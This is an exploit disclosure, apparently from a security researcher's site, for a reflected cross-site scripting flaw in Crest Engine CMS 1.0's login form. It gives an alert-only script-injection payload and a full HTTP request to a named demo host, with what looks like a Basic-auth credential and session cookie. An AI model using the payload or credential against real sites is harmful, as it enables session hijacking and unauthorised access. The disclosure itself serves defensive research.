Crest Engine CMS 1.0 Cross Site Scripting
Crest Engine CMS 1.0 Cross Site Scripting
# Exploit Title: Crest Engine CMS - Reflected Cross-Site # Exploit Title: Crest Engine CMS - Reflected Cross-Site Scripting (XSS)
# Exploit Author: wa-3, Telegram: @wa0_3
# Vendor Homepage: http://e-gate.me/
# Version: 1.0
# Tested on: http://demo.e-gate.me/

Vulnerable path:/crest/engine/
Vulnerable file:login_form.php
Vulnerable Parameter:Message

Poc: /crest/engine/login_form.php?Message="></><script>alert('test')</script>
Host: demo.e-gate.me
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic dGhhbmFhOlNAbTBoMw==
Connection: keep-alive
Cookie: PHPSESSID=23gq4mrf9fhil9i4q9htbo62p1
Upgrade-Insecure-Requests: 1

Response came back with a popup "test" alert.
Social Media Share
About Contact Terms of Use Privacy Policy
© 2025 Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.